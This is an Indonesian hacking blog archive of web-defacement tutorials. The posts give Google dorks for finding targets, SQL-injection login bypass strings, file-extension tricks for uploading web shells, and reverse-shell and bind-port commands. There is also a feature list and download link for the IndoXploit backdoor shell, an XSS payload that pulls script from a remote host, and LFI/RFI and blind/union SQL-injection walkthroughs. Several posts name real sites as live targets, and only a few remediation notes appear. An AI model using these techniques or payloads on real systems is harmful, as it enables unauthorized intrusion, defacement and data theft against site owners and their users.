Codes Xploit: deface
Showing posts with label deface. Show all posts
Showing posts with label deface. Show all posts

Tutorial Deface Metode Bypass Admin Login

 
Hallo sobat kali ini gw bakal berbagi tutorial cara deface metode bypass admin login + up shell ?? Ea ok pertama tama dorking dulu ya :"v

Dork :

inurl:/admin/login.php
inurl:/admin/dashboard.php 

Dorknya di kembangin lagi ya sobat biar dapet yang masih volos ~

Ok tahap selanjutnya slakan coba login menggunakan u/p di bawah ini :

'="or'
' or 1=1 limit 1 -- -+
' OR 1#'

Untuk selengkapnya bisa ke google aja kwkwkw ok gw disini bakal test loginya pakek '="or' . cara mengetahui website tersebut vuln ato kaga gampang coba trobos pakek 3 kode di atas aja kalo vuln bakal di redirect ke dashboard admin :"v



W bakal coba pakek '="or' 


Dan hasilnya ... 


Ya gw berhasil login sebagain administrator website tersebut.

Sekarang kita cari bagian yg bisa di gunakan untuk upload shell kita.. biasanya di bagian gallery atau slider / dll pokoknya yg bisa digunakan untuk mengupload shell.

Nih contohnya gw dapet tempat upload hehehe disini gw bakal mencoba menggunakan exitensi .php secara langsung tanpa bypass ext.


Dan apakah bisa?...


Yaps, ternyata bisa :) 

sekarang tinggal akses shell nah untuk kalian yg di pc / leptop kalian tinggal tklik kanan open newtab gambar error tersebuk nah buat kalian yg user andro kek gw ikutin cara ini !

1.Tambahkan kata view-source: pada awal url


2. Cari link yg ber-type .php
 ( sesuai yg kalian upload )

Kalo udah ketemu klik linknya !
 Dan..

Voilah shell berhasil di tanam :)

Ok sobat sekian dulu kali ini sampe ketemu di post besok ! Bay bay

Cara Deface Metode Restricted Area

 
Hae sobat2 kuh h3h3 kali ini gw bakal berbagi tutorial deface yang gampang..
ya gampang,, gampang :V LOL ok langsung aja ke tutorial :V


Dork : 
inurl:/wp intext:"area" ext:php
intext:"Restricted Area" ext:php

Kembangin ea coeg :V

Ok ciri2 vuln ya ada tempat upload kek di gambar berikut ini :
Nah Disitu kalian bisa upload shell kalian ^^ h3h3.

Akses shellnya gimana kakak? Akses Shell terdapat di direktori yang sama dengan Uploader ini dek ^^

Contoh : 
site.com/adress.php < ini vuln
akses nya gini site.com/nama_shell_ente.php < shell ente

Sekian dari gw bay bay ~

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

Cara Deface Metode Uploadify + Up Shell

 
Hallo sobat2 :"v dah lama banget ya gw ngak update tutorial deface :"v ya maklumi aja gw lagi males ngerjain tutorial yg kek gini :"v

Ok ah langsung aja 

Dork : 
inurl:/uploadify/uploadify.php
( kembangin pakek otak hentongers lo :"v )

Csrf : http://touya-niichan.cf/csrf.php 
Post : Filedata 


ok langsung aja pertama-tama ngedork dulu 


Lalu pilih web yang menurut lo vuln ( web vuln = blank page )

Lalu masukan url web vulnnya ke csrf > lock > upload deh :)


Akses shell?? inggal www.target.us/shell.php 

Abistu silakan tebas index.php nya tapi gw saranin backup dulu biar ngak terjadi masalah :')


Ok sekian dari gw semoga membantu :)

e-soft Webdesign Adminpanel Bypass

Bypass Admin di CMS e-soft :)
1. Dorking Dulu Dorknya: intext:Website Design Company : e-Soft site:.bd


2. Jika kita sudah menemukan site nya :) selanjutnya masuk ke halaman login nya :)
    Tambahkan di belakang site nya: /index.php/esoft_cms/login
Contoh: http://site.com.bd/index.php/esoft_cms/login

*Tampilan Halaman Login nya!

3.Untuk Bypass Admin nya masukan Exploit nya :)
Username/Password: 'or'1'='1

4.Jika Berhasil anda akan masuk ke halaman Administrator nya :) dan Selamat anda dapat akses sebagai admin di website tersebut :)

*Tampilan Halaman Administrator nya :)

Sekian Tutorial dari Saya dan Terima Kasih

-Mr.7z

Thx to mr.Gh0st N@0b & Myanmar Noob Hackers

Deface Metode Dorking WebShell

 


Hallo sobat :v ciee yang dateng kesini mau apa bang ? :v ini buat newbie lho bukan buat lo yang pr0 :v btw ini gw buat di hp lagi lho subuh subuh pula :v kek kata orang kalo ada ide langsung di ketik ea :v ok cukup bacot gaje nya langsung aja nih dorknya

DORK Fress :v 

  • intitle:"- phpshell" ext:php
  • inurl:/eue.php 
  • inurl:/asw.php
  • inurl:/uplo.php
  • intitle:"IndoXploit" ext:php 
  • intitle:" - c99.php" inurl:/admin
  • intitle:"Mini Shell" ext:php5
  • intitle:"AnonymousFox"
  • intitle:"B Ge Team File Manager"
  • intitle:"$$ Beby $$" ext:php
  • intitle:"404-server!!"
  • intitle:"Mister Spy"
ok ntu dia dorknya :v

sisanya tinggal ke public_html atau wwwroot atau www / web ya gitulah pokoknya lalu upload file lo deh Lalu mirrorin tinggal soof deh  kwokwokwokowkwoke :v

Jangan lupa share dan liat post post lainnya :)

Cara Deface Metode Kcfinder + UpShell

 
Hallo sobat sobat AkatsuChan kali ini gw update posnya di mobile biar Gg jadi maaf lah kalo agak salah salah ketik as typo :v

Ok langsung aja Kita ke Praktek coli eh maksudnya Deface :v

DORK :
Inurl:/kcfinder
Inurl:/kcfinder/upload/files
Inurl:/kcfinder/browse.php
( kembangin pakek imajinasi mu itu :v )


Ok tutorial ~

Pertama tama berdoa agar di beri kelancaran saat deface :v

Ok pertama tama tama dorking pilih yg menurutmu itu vuln ( pakek insting ) 

ok kalo udah klik link tadi ~ kalo opennya index of ganti jadi kcfinder/browse.php ok ok zeeb ~

Klo udah nanti ada bagian upload nah diditu kalian bisa upload file .Html kalian kalo beruntung bisa uplosd file .Php bisa pakek bypass ext ato tamper data nih kalo pakek bypass ext nih bypassnya 

Shell.Php.Xxxjpg
Shell.Php.pjpg
shell.Php.j
Shell.Php.Txt

sesuai judul disini gw upload shell ok



cara akses file / shell Tambahin kekgini~
www.Target.Coli/kcfinder/upload/files/shellmu.Php

Ok sekian aja dari gw kalo hasil deface gw bisa dilihat disini ~


Skian dari gw semoga bermanfaat bagi kalian ~


Cara Deface Metode Pasang Iklan

 

Hallo Sobat Subat Akatsuki-Hacker Kalini gw mau Berbagi ilmu Sedikit :)
ya sesuai judul cara deface metode pasang iklan ... tapi ini ngak pakek tamper data lho jadi lebih mudah bahkan kalian ngak perlu bypass ext ! sugoi desho .. eh sorry kebiasaan ngwibu gw kambuh :v ok langsung aja

DORK :
inurl:/daftar.php intext:"PASANG IKLAN"
inurl:/iklan_gratis.php intitle:"MegaIklan"
intext:"copyright � 2012 PermataIklan.com All Right Reserved"


Kembang kan ya :) btw pas gw ngedork pakek ini ada orang kecyduk reedit render logo kemerdekaan gw :v kwokowkowkow  

Ok langsung ke toturialnya ja yak :v

Pertama tama siapin Secangkir Teh anget ( tempat gw ujan soalnya :v )

Ok Serius serius :v Ea 

Tutorial

Daftar terlebih dahulu ke website tersebut klik bagian reguster di panel atas!
lalu register terserah mau di isi pakek apa yg penting email sama pw nya kalia ingat ..


Ok lanjut kalo udah daftar silakan login ke bagian login member di samping kalian.. kalo ngak ada bagian loginnya ( nge bag ) Coba kek gini
http://web-target.co.li/login2.php  Seharusnya gitu bisa berhasil..

ok kalo kalian udah selesai login bakal di arahin ke index.php kan ok zeb
lalu pilih bagian iklan di header atas !



Ok Lalu isi from pasang iklannya terserah kalian mau apa :v Penting ke isi aja :v
Ok untuk bagian upload image masukin shell mini kalian bisa pakek yg gw disini
Atau dinisi dan disini OK Untuk jelasnya silakan liat ss dibawah ini !

Gitulah kira kira ok langsung klik Pasang iklan bila berhasil maka ada popup kecil + bagian form regis iklan tadi ilang .

Cara aksess Shell kalian

http://www.target-kalian.co.li/images/iklan_baris/shell.php

Apa bila masih kurang jelas silakan lihat video tutorial dibawah ini 

Tutorial deface dengan bypass admin

Bypass admin login Ok gan hello pa kabar?,baik lah y OK! , Entri gw kali ini mau share tutor deface pake metode Bypass Admin Login yang belakanganan ini sering gw pake..

Kuylah  langsung aja tutornya'.,')/

1.Dorking admin page buat kita bypass


inurl:/administrator/login.php  < < dork yang saya pake
inurl:/admin/login.php
inurl:/admin/dashboard.php  "Welcome"

dork simple ginimah sisahnya kembangin aja ok B-)

2
.Pilih target kalian sesuai dork , sampe kalian masuk ke page admin login'<'


3.Setelah masuk ke page admin login'-')/ , isi username & password dengan  '="or'

(Jika websitenya vuln , maka kita akan masuk ke DASHBOARD adminya)





4.Contohnya gini kalo vuln,setelah itu kalian bisa cari uploader buat upload backdoor kalian,biasanya di banner,slider,logo atau apalah :"
                         

                                 Kalo saya upload shell di gallery + bypass ext shellnya  ^o^

Setelah itumah bebas mau kalian apakan websitenya'-')/



        Dah sekian dulu Entri dari sy gan , wassalam!



           

Cara Deface Metode Com Fabrik

 
Hallo Sobat Sobat dah lama banget gw ngak update *ngak lama banget sih...
OK sesuai judul gw bakal update Tutorial Deface Metode Com Fabrik hemm ini tutorial lumayan simpel dan mudah banget ( lumayan buat nembak gebetan :v ) OK langsung aja

Dork : 
inurl:viewTable?cid= site:com
inurl:viewTable?cid= site:net
inurl:viewTable?cid= site:org
( kembangin lagi pakek imajinasi Hentonger lo )

Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Ok langsung tutorial nya pertama tama ngedork dulu pakek Dork di atas

Pilih Website yg menurut kamu itu vuln ok ... lalu masukan exploit ke bar url
nanti ada Tombol upload kek gambar di bawah ini 


Klik Choose File Lalu Pilih Script Deface kalian
( kalo web tersebut vuln terhadap .phtml tidak ada slahanya mengupload shell saja ) 

Terus Selesai deh :)

kak kak Gimana cara aksesnya ?

cara aksessnya gini :  www.website-target.co.li/media/file-lo.html

Sekian dari gw semoga bermanfaat ! Jika kurang jelas kalian bisa menonton video di box ini

Tutorial Reverse Shell Dengan Bind Port

 
Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.


Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.
Jalankan command bind port pada shell indoxploit V.3.
$ rvr bp [PORT] perl
Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.
Jalankan command nc.
$ nc [IP] [PORT]

Oke itu saja, mudah bukan?
Sekian dulu kawann..


Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

 
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.


Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

XSS Vuln Google Translate

XSS Vuln Google Translate

Jangan Bully Yo Cuman Noob

Kode :

<Img src = "Link Image mu"
onload = "alert (" W0t ")"> </ img>
<Marquee> <h1> Kata - Kata mu </ h1> </ marquee>
<Script> alert (document.domain) </ script>
    <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//localhost:1338";d.body.appendChild(z)},0)>

simpan kode dengan ext txt

Bukak Web Google Translate
[*] https://translate.google.com.br
or
[*] https://translate.google.com
Klik tulisan translate a document.
Terus Upload Kode XSS Tadi Habis Itu Klik Translate :'v

Gambar :
19496279_458354567864950_1336230454_o.thumb.png.92d87ea98abd0bdb66af8cfcda8de9f4.png 0

Copyright : Mr.Hydra

Sumber : http://www.tikuspintar.ga/2017/06/xss-vuln-google-translate.html

IndoXploit Shell First Edition [ V.3 ]

 
Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

Tutorial deface dengan register member upload shell

Yuhuuu wazzzupp'.')/ salken gw el,kali ini gua bakalan ngasih tutorial deface dengan register member upload shell,menurut gw ini cara deface yg simple xd karna memanfaatkan tempat uploader foto untuk meng-upload Backdoor,tapi kadang harus pake metode tamper,- atau bypass ext:*

Kuy langsung aja intip tutorialnya

1.Dorking cari pacar ,, target lah
dork:
inurl:media.php?module=daftar
inurl:register.html intext:Pendaftaran Pengguna

(kembangin lagi pake otak nekepoi kalian xd)

2.Register/Daftar


3.Setelah register/daftar ntar user sama passwordnya keliatan,next step LOGIN,pake user&pw yg udah di di sediakan,setelah register tadi'.')/





4.setelah login^ klw el upload shell pada uploader  pict di profil user, +bypass shell.php.xxxjpg trus klik kanan > lihat gambar

5.Done xdxdxd ,, tinggal kalian anuin'.')/ *nb klw mau tebas index usahakan back up mz :'")


Okay tq , cukup sekian tutor dari el kali ini,mohon di maafkan jika ada kekurangan atau kesalahanya^^ TERIMAKASIH














Powered By Nusiorung - Bypassing Admin Login

 

Google Dork:  intext:"Powered By Nusiorung"

Login Dengan Username & Password
Username : ' OR 1 #
Password : ' OR 1 #




Jika sudah login, langsung menuju "Document" untuk mengupload shell backdoor.



Setelah itu, klik kotak pada bagian bawah


Langsung upload shell kita disini



Jika Sudah, kalian akan melihat shell kalian seperti ini, di dalam list document tadi

( Yang dilingkari merah adalah nama file shell backdoor anda )


Selanjutnya, letak shell kalian ada di:
-> /admin/document/upload/shell.php

Contoh: http://target.com/admin/document/upload/YJE6ZH.php

Live Target: 
http://edu.nmc.ac.th/th/admin/


Oke, Sekian Dulu Tutorial nya, Silakan kalian kembangi lagi.

Cara Deface dengan LFI/RFI | New Team Cyber

 
Buat yg belum tau aja yhaa... klo yg udh jago, mending ga ush di baca... drpd buang2 waktu :tongue:

Sebelumnya apa sih LFI dan RFI itu??

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:



Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini

Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Semoga tutor sederhana dan sangat awam ini (Maklum, yg nulis jg msh awam) bermanfaat.

Sumber: Hacker Newbie
Edited by : bLack_peArL
Source : http://indocyberarmy.blogspot.com/2013/02/tutor-singkat-rfi-lfi.html

Blind SQL Injection | New Team Cyber

 



Ane akan mencoba menjelaskan semudah mungkin tentang Blind SQL Injection yang ane anggap rumit banget... Bukannya sok ngajarin atau apalah, disini ane hanya berusaha memberikan apa yang ane punya dan bisa...

 Apa sich Blind SQL Injection tu?



Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita tidak memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection
Edited by : bLacK_peArL
Source : http://indocyberarmy.blogspot.com/2013/02/blind-sql-injection.html

Teknik Manual SQL Injection | New Team Cyber

 
Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ?tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

